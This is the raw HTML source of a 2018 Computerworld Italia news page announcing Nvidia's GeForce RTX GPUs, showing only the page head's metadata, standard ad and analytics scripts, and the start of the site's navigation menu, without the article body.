<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="it" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <!--<![endif]-->
<head>
    <title>Nvidia alza il sipario sulle GPU GeForce RTX</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="fb:pages" content="57124186370" />
    <link rel="pingback" href="https://www.cwi.it/xmlrpc.php" />
        <meta name="author" content="CWI.it">
<link rel="icon" type="image/png" href="https://static.cwi.it/wp-content/uploads/2015/10/favicon.png">
<!-- This site is optimized with the Yoast SEO plugin v6.3 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Le nuove Nvidia GeForce RTX saranno disponibili dal 20 settembre 2018, ma Acer, Alienware e HP hanno annunciato i primi PC da gaming che sfruttano le nuove GPU"/>
<link rel="canonical" href="https://www.cwi.it/hardware/presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645" />
<meta property="og:locale" content="it_IT" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Nvidia alza il sipario sulle GPU GeForce RTX" />
<meta property="og:description" content="Le nuove Nvidia GeForce RTX saranno disponibili dal 20 settembre 2018, ma Acer, Alienware e HP hanno annunciato i primi PC da gaming che sfruttano le nuove GPU" />
<meta property="og:url" content="https://www.cwi.it/hardware/presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645" />
<meta property="og:site_name" content="Computerworld Italia" />
<meta property="article:publisher" content="https://www.facebook.com/computerworlditalia" />
<meta property="article:author" content="https://it-it.facebook.com/computerworlditalia" />
<meta property="article:tag" content="GeForce RTX" />
<meta property="article:tag" content="Nvidia" />
<meta property="article:section" content="Hardware" />
<meta property="article:published_time" content="2018-08-21T17:54:40+02:00" />
<meta property="article:modified_time" content="2018-08-21T17:55:32+02:00" />
<meta property="og:updated_time" content="2018-08-21T17:55:32+02:00" />
<meta property="fb:admins" content="650418148" />
<meta property="og:image" content="https://static.cwi.it/wp-content/uploads/2018/08/nvidia_geforce_rtx_jensen_huang_gamescom.jpg" />
<meta property="og:image:secure_url" content="https://static.cwi.it/wp-content/uploads/2018/08/nvidia_geforce_rtx_jensen_huang_gamescom.jpg" />
<meta property="og:image:width" content="640" />
<meta property="og:image:height" content="427" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="Le nuove Nvidia GeForce RTX saranno disponibili dal 20 settembre 2018, ma Acer, Alienware e HP hanno annunciato i primi PC da gaming che sfruttano le nuove GPU" />
<meta name="twitter:title" content="Nvidia alza il sipario sulle GPU GeForce RTX" />
<meta name="twitter:site" content="@ComputerworldIT" />
<meta name="twitter:image" content="https://static.cwi.it/wp-content/uploads/2018/08/nvidia_geforce_rtx_jensen_huang_gamescom.jpg" />
<meta name="twitter:creator" content="@computerworldit" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.cwi.it\/","name":"Computerworld Italia","alternateName":"CWI.it","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.cwi.it\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"https:\/\/www.cwi.it\/hardware\/presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645","sameAs":["https:\/\/www.facebook.com\/computerworlditalia","https:\/\/twitter.com\/ComputerworldIT"],"@id":"#organization","name":"Fiera Milano Media SpA","logo":"http:\/\/www.cwi.it\/wp-content\/uploads\/2015\/11\/logo-Fiera-Milano-Media-Expo.jpg"}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//ajax.googleapis.com' />
<link rel='dns-prefetch' href='//sharecdn.social9.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Computerworld Italia &raquo; Feed" href="https://www.cwi.it/feed" />
<link rel="alternate" type="application/rss+xml" title="Computerworld Italia &raquo; Feed dei commenti" href="https://www.cwi.it/comments/feed" />
<meta name="google-site-verification" content="9_jAYj5XV73KSoz4UK_0fIVfLwdcncF3GYlalvL2g3Q" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.cwi.it\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='gforms_reset_css-css'  href='https://static.cwi.it/wp-content/plugins/gravityforms/css/formreset.min.css?ver=1.9.14.28' type='text/css' media='all' />
<link rel='stylesheet' id='gforms_formsmain_css-css'  href='https://static.cwi.it/wp-content/plugins/gravityforms/css/formsmain.min.css?ver=1.9.14.28' type='text/css' media='all' />
<link rel='stylesheet' id='gforms_ready_class_css-css'  href='https://static.cwi.it/wp-content/plugins/gravityforms/css/readyclass.min.css?ver=1.9.14.28' type='text/css' media='all' />
<link rel='stylesheet' id='gforms_browsers_css-css'  href='https://static.cwi.it/wp-content/plugins/gravityforms/css/browsers.min.css?ver=1.9.14.28' type='text/css' media='all' />
<link rel='stylesheet' id='oss-social-sharing-front-css'  href='https://static.cwi.it/wp-content/plugins/simplified-social-share/oss-social-sharing/assets/css/oss-social-sharing-front.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='oss-share-widget-style-css'  href='https://sharecdn.social9.com/v2/css/os-share-widget-style.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-notice-front-css'  href='https://static.cwi.it/wp-content/plugins/cookie-notice/css/front.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='cwi_style-css'  href='https://static.cwi.it/wp-content/plugins/cwi/css/style.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='fmm-cookie-notice-front-css'  href='https://static.cwi.it/wp-content/plugins/fmm-cookie-notice/css/front.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='wsl-widget-css'  href='https://static.cwi.it/wp-content/plugins/wordpress-social-login/assets/css/style.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='inbound-shortcodes-css'  href='https://static.cwi.it/wp-content/plugins/cta/shared/shortcodes/css/frontend-render.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-rest-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A400italic%2C700italic%2C700%2C400%7COpen+Sans%3A400italic%2C600italic%2C700italic%2C400%2C700%2C600&#038;ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='custom-style-css'  href='https://static.cwi.it/wp-content/themes/Newsmag/css/custom.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='https://static.cwi.it/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://static.cwi.it/wp-content/themes/cwi/style.css?ver=1.5' type='text/css' media='all' />
<link rel='stylesheet' id='newsmag-style-css'  href='https://www.cwi.it/wp-content/themes/Newsmag/style.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='cwi-style-css'  href='https://static.cwi.it/wp-content/themes/cwi/css/cwi.css?ver=1.2' type='text/css' media='all' />
<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js?ver=1.11.1'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/direct-mail/js/nx-direct-mail.js?ver=4.9.4'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/gravityforms/js/jquery.json.js?ver=1.9.14.28'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=1.9.14.28'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var cnArgs = {"ajaxurl":"https:\/\/www.cwi.it\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"TRUE","cookieTime":"2592000","cookiePath":"\/","cookieDomain":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/cookie-notice/js/front.js?ver=1.2.36.1'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/cwi/js/cwi.js?ver=4.9.4.2.0'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/fmm-cookie-notice/js/front.js?ver=4.9.4'></script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/themes/Newsmag/js/custom.js?ver=4.9.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var cta_variation = {"cta_id":null,"admin_url":"https:\/\/www.cwi.it\/wp-admin\/admin-ajax.php","home_url":"https:\/\/www.cwi.it","split_testing":"1","sticky_cta":"1","page_tracking":"on"};
/* ]]> */
</script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/cta/assets/js/cta-variation.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var inbound_settings = {"post_id":"114645","post_type":"post","variation_id":"0","ip_address":"52.144.69.18","wp_lead_data":{"lead_id":null,"lead_email":null,"lead_uid":null,"lead_nonce":null},"admin_url":"https:\/\/www.cwi.it\/wp-admin\/admin-ajax.php","track_time":"2018\/08\/23 11:55:56","page_tracking":"on","search_tracking":"on","comment_tracking":"off","custom_mapping":[],"is_admin":"","ajax_nonce":"e21e21acca"};
/* ]]> */
</script>
<script type='text/javascript' src='https://static.cwi.it/wp-content/plugins/cta/shared/assets/js/frontend/analytics/inboundAnalytics.min.js'></script>
<link rel='https://api.w.org/' href='https://www.cwi.it/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.cwi.it/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://static.cwi.it/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.4" />
<link rel='shortlink' href='https://www.cwi.it/?p=114645' />
<link rel="alternate" type="application/json+oembed" href="https://www.cwi.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.cwi.it%2Fhardware%2Fpresentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645" />
<link rel="alternate" type="text/xml+oembed" href="https://www.cwi.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.cwi.it%2Fhardware%2Fpresentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming-114645&#038;format=xml" />
<meta name="majestic-site-verification" content="MJ12_a293f202-1a4b-474e-9a8a-6fb52a7ee972" />
<!-- Start: GPT Async -->
<script type='text/javascript'>
	var gptadslots=[];
	var googletag = googletag || {};
	googletag.cmd = googletag.cmd || [];
	(function(){ var gads = document.createElement('script');
		gads.async = true; gads.type = 'text/javascript';
		var useSSL = 'https:' == document.location.protocol;
		gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js';
		var node = document.getElementsByTagName('script')[0];
		node.parentNode.insertBefore(gads, node);
	})();
</script>

<script type="text/javascript">
	googletag.cmd.push(function() {


<!-- Start: Responsive mapping -->

    //Adslot 1 declaration
    var mapping1 = googletag.sizeMapping().
    addSize([1024, 768], [728,90]).
    addSize([980, 690], [728,90]).
    addSize([640, 480], [320,50]).
    addSize([0, 0], [320, 50]).build();


    //Adslot 2 declaration
    var mapping2 = googletag.sizeMapping().
    addSize([1024, 768], [300,250]).
    addSize([980, 690], [300,250]).
    addSize([640, 480], [300,250]).
    addSize([0, 0], [300, 250]).build();


    //Adslot 3 declaration
    var mapping3 = googletag.sizeMapping().
    addSize([1024, 768], [300,250]).
    addSize([980, 690], [300,250]).
    addSize([640, 480], [300,250]).
    addSize([0, 0], [300, 250]).build();


    //Adslot 4 declaration
    var mapping4 = googletag.sizeMapping().
    addSize([1024, 768], [300,600]).
    addSize([980, 690], [300,600]).
    addSize([640, 480], [300,600]).
    addSize([0, 0], [300, 600]).build();


    var mapping9 = googletag.sizeMapping().
    addSize([1349, 637], [1,3]).
    addSize([1005, 637], [1,3]).
    addSize([980, 690], [1,3]).
    addSize([640, 480], [0,0]).
    addSize([0, 0], [0, 0]).build();

<!-- End: Responsive mapping -->

		//Adslot 1 declaration
		gptadslots[1]= googletag.defineSlot('/3706/CWI/Hardware', [[728,90]],'div-gpt-ad-795412788689030374-1').defineSizeMapping(mapping1).addService(googletag.pubads());

		//Adslot 2 declaration
		gptadslots[2]= googletag.defineSlot('/3706/CWI/Hardware', [[300,250]],'div-gpt-ad-795412788689030374-2').defineSizeMapping(mapping2).setTargeting('pos',['1']).addService(googletag.pubads());

		//Adslot 3 declaration
		gptadslots[3]= googletag.defineSlot('/3706/CWI/Hardware', [[300,250]],'div-gpt-ad-795412788689030374-3').defineSizeMapping(mapping3).setTargeting('pos',['2']).addService(googletag.pubads());
		
		//Adslot 12 declaration
		gptadslots[12]= googletag.defineSlot('/3706/CWI/Hardware', [[300,250]],'div-gpt-ad-795412788689030374-12').setTargeting('pos',['3']).addService(googletag.pubads());
		

		//Adslot 4 declaration
		gptadslots[4]= googletag.defineSlot('/3706/CWI/Hardware', [[300,600]],'div-gpt-ad-795412788689030374-4').defineSizeMapping(mapping4).setTargeting('pos',['1']).addService(googletag.pubads());
		
		//Adslot 11 declaration
		gptadslots[11]= googletag.defineSlot('/3706/CWI/Hardware', [[300,600]],'div-gpt-ad-795412788689030374-11').setTargeting('pos',['2']).addService(googletag.pubads());

		//Adslot 5 declaration
		gptadslots[5]= googletag.defineSlot('/3706/CWI/Hardware', [[300,100]],'div-gpt-ad-795412788689030374-5').setTargeting('pos',['1']).addService(googletag.pubads());

		//Adslot 6 declaration
		gptadslots[6]= googletag.defineSlot('/3706/CWI/Hardware', [[300,100]],'div-gpt-ad-795412788689030374-6').setTargeting('pos',['2']).addService(googletag.pubads());

		//Adslot 7 declaration
		gptadslots[7]= googletag.defineSlot('/3706/CWI/Hardware', [[300,100]],'div-gpt-ad-795412788689030374-7').setTargeting('pos',['3']).addService(googletag.pubads());

		//Adslot 8 declaration
		gptadslots[8]= googletag.defineSlot('/3706/CWI/Hardware', [[640,480]],'div-gpt-ad-795412788689030374-8').addService(googletag.pubads());

		//Adslot 9 declaration
		gptadslots[9]= googletag.defineSlot('/3706/CWI/Hardware', [[1,3]],'div-gpt-ad-795412788689030374-9').defineSizeMapping(mapping9).addService(googletag.pubads());
		
		//Adslot 10 declaration - Out of Page
		gptadslots[10] = googletag.defineOutOfPageSlot('/3706/CWI/Homepage', 'div-gpt-ad-795412788689030374-10').addService(googletag.pubads());

		googletag.pubads().setTargeting('category','Featured,Hardware,News');
		googletag.pubads().collapseEmptyDivs();
		googletag.pubads().enableAsyncRendering();
		googletag.enableServices();
	});
</script>
<!-- End: GPT --><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://static.cwi.it/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="https://static.cwi.it/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.td_filter_ui_uid = ''; //used to select a item from the drop down filter
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="https://www.cwi.it/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="https://www.cwi.it/wp-content/themes/Newsmag";
var tds_snap_menu="";
var tds_logo_on_sticky="";
var tds_header_style="";
var td_search_url="https://www.cwi.it/search";
var td_please_wait="Attendere prego ...";
var td_email_user_pass_incorrect="Utente o password errata!";
var td_email_user_incorrect="E-mail o nome utente errato!";
var td_email_incorrect="Email errato!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="1";
var tds_more_articles_on_post_pages_distance_from_top="600";
var tds_theme_color_site_wide="#185b92";
var tds_smart_sidebar="enabled";
var td_magnific_popup_translation_tPrev="Precedente (tasto ←)";
var td_magnific_popup_translation_tNext="Successivo (tasto →)";
var td_magnific_popup_translation_tCounter="%curr% di %total%";
var td_magnific_popup_translation_ajax_tError="Il contenuto da %url% non può essere caricato.";
var td_magnific_popup_translation_image_tError="L'#%curr% immagine non può essere caricata.";
</script>

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    <!-- Google Web Font -->
    <link href='https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300,700' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Merriweather:400,700' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,600' rel='stylesheet' type='text/css'>

	<!--PLEASE PUT THIS SCRIPT IN THE HEAD SECTION OF ALL YOUR PAGES-->
	<!--<script type="text/javascript" src="//ad.idgtn.net/tnc.js"></script> -->

	
</head>


<body class="post-template-default single single-post postid-114645 single-format-standard presentate-le-nuove-nvidia-geforce-rtx-il-futuro-del-gaming single_template_2 white-grid wpb-js-composer js-comp-ver-4.12 vc_responsive td-full-layout">
<!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-WXS5LQ"
                  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
        new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-WXS5LQ');</script>
<!-- End Google Tag Manager -->

<div id="td-outer-wrap">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

    <div class="td-transition-content-and-menu td-mobile-nav-wrap">
        <div id="td-mobile-nav">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">CHIUDI</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-principale-2017-container"><ul id="menu-principale-2017" class=""><li id="menu-item-106235" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-first menu-item-106235"><a title="Software Business" href="https://www.cwi.it/applicazioni-enterprise">Software</a>
<ul class="sub-menu">
	<li id="menu-item-106236" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106236"><a href="https://www.cwi.it/applicazioni-enterprise/app-desktop">App Desktop</a></li>
	<li id="menu-item-106241" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106241"><a href="https://www.cwi.it/applicazioni-enterprise/office">Office</a></li>
	<li id="menu-item-106237" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106237"><a href="https://www.cwi.it/applicazioni-enterprise/architettura-enterprise">Architettura Enterprise</a></li>
	<li id="menu-item-106244" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106244"><a href="https://www.cwi.it/applicazioni-enterprise/gestione-database">Database</a></li>
	<li id="menu-item-106243" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106243"><a href="https://www.cwi.it/applicazioni-enterprise/gestionali">Gestionali</a></li>
	<li id="menu-item-106238" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106238"><a href="https://www.cwi.it/applicazioni-enterprise/business-intelligence-bi">Business Intelligence (BI)</a></li>
	<li id="menu-item-106240" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106240"><a href="https://www.cwi.it/applicazioni-enterprise/crm">CRM</a></li>
	<li id="menu-item-106242" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106242"><a href="https://www.cwi.it/applicazioni-enterprise/enterprise-resource-planning-erp">Enterprise Resource Planning (ERP)</a></li>
	<li id="menu-item-106239" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106239"><a href="https://www.cwi.it/applicazioni-enterprise/contentdocument-management">Content/Document Management</a></li>
	<li id="menu-item-106251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106251"><a href="https://www.cwi.it/applicazioni-enterprise/unified-communications-uc">Unified Communications (UC)</a></li>
	<li id="menu-item-106245" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106245"><a href="https://www.cwi.it/applicazioni-enterprise/open-source">Open Source</a></li>
	<li id="menu-item-106250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106250"><a href="https://www.cwi.it/applicazioni-enterprise/software-as-a-service-saas">Software as a Service (SaaS)</a></li>
	<li id="menu-item-106249" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106249"><a href="https://www.cwi.it/applicazioni-enterprise/collaborazione">Software di Collaborazione</a></li>
	<li id="menu-item-106246" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106246"><a href="https://www.cwi.it/applicazioni-enterprise/integrazione-di-servizi">Integrazione di servizi</a></li>
	<li id="menu-item-106247" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106247"><a href="https://www.cwi.it/applicazioni-enterprise/sviluppo-app">Sviluppo App</a></li>
	<li id="menu-item-106248" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106248"><a href="https://www.cwi.it/sviluppo-software">Sviluppo software</a></li>
</ul>
</li>
<li id="menu-item-106252" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-106252"><a title="Hardware, pc, processori, server, ssd" href="https://www.cwi.it/hardware">Hardware</a>
<ul class="sub-menu">
	<li id="menu-item-106264" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106264"><a href="https://www.cwi.it/hardware/pc-windows">PC Windows</a></li>
	<li id="menu-item-106254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106254"><a href="https://www.cwi.it/hardware/apple-mac">Apple Mac</a></li>
	<li id="menu-item-106253" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106253"><a href="https://www.cwi.it/hardware/notebook">Notebook</a></li>
	<li id="menu-item-106259" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106259"><a href="https://www.cwi.it/hardware/pc-linux">PC Linux</a></li>
	<li id="menu-item-106255" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106255"><a href="https://www.cwi.it/hardware/chrome-os">ChromeBook</a></li>
	<li id="menu-item-106262" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106262"><a href="https://www.cwi.it/hardware/server">Server</a></li>
	<li id="menu-item-106257" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106257"><a href="https://www.cwi.it/hardware/periferiche-pc">Periferiche PC</a></li>
	<li id="menu-item-106263" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106263"><a href="https://www.cwi.it/hardware/dischi-ssd">Dischi SSD</a></li>
	<li id="menu-item-106258" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106258"><a href="https://www.cwi.it/hardware/processori-pc-e-server">Processori PC e server</a></li>
</ul>
</li>
<li id="menu-item-106269" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106269"><a title="Sistemi Operativi" href="https://www.cwi.it/sistemi-operativi">Sistemi</a>
<ul class="sub-menu">
	<li id="menu-item-106265" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106265"><a href="https://www.cwi.it/sistemi-operativi/windows">Windows</a></li>
	<li id="menu-item-106266" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106266"><a href="https://www.cwi.it/sistemi-operativi/mac-os-x">macOS</a></li>
	<li id="menu-item-106267" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106267"><a href="https://www.cwi.it/sistemi-operativi/linux">Linux</a></li>
	<li id="menu-item-106268" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106268"><a href="https://www.cwi.it/sistemi-operativi/chrome-os-sistemi-operativi">Chrome OS</a></li>
</ul>
</li>
<li id="menu-item-106270" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106270"><a title="Internet, Social Media, Online Marketing, Motori di Ricerca, Browser" href="https://www.cwi.it/internet">Internet</a>
<ul class="sub-menu">
	<li id="menu-item-106271" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106271"><a href="https://www.cwi.it/internet/e-commerce">E-commerce</a></li>
	<li id="menu-item-106272" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106272"><a href="https://www.cwi.it/internet/ricerca">Ricerca</a></li>
	<li id="menu-item-106273" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106273"><a href="https://www.cwi.it/internet/social-media">Social Media</a></li>
	<li id="menu-item-106274" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106274"><a href="https://www.cwi.it/internet/applicazioni-web">Applicazioni Web</a></li>
	<li id="menu-item-106275" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106275"><a href="https://www.cwi.it/internet/browser-web">Browser</a></li>
	<li id="menu-item-106276" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106276"><a href="https://www.cwi.it/internet/marketing-online">Digital Marketing</a></li>
</ul>
</li>
<li id="menu-item-106277" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106277"><a title="Smartphone e tablet per lavorare" href="https://www.cwi.it/mobile-wireless">Mobile</a>
<ul class="sub-menu">
	<li id="menu-item-106285" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106285"><a href="https://www.cwi.it/mobile-wireless/smartphone">Smartphone</a></li>
	<li id="menu-item-106286" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106286"><a href="https://www.cwi.it/mobile-wireless/tablet">Tablet</a></li>
	<li id="menu-item-106278" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106278"><a href="https://www.cwi.it/mobile-wireless/apple-ios">Apple iOS</a></li>
	<li id="menu-item-106279" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106279"><a href="https://www.cwi.it/mobile-wireless/android">Android</a></li>
	<li id="menu-item-106280" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106280"><a href="https://www.cwi.it/mobile-wireless/windows-phone">Windows Phone</a></li>
	<li id="menu-item-112257" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-112257"><a href="https://www.cwi.it/mobile-wireless/5g">5G</a></li>
	<li id="menu-item-106281" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106281"><a href="https://www.cwi.it/mobile-wireless/app-mobile">App Mobile</a></li>
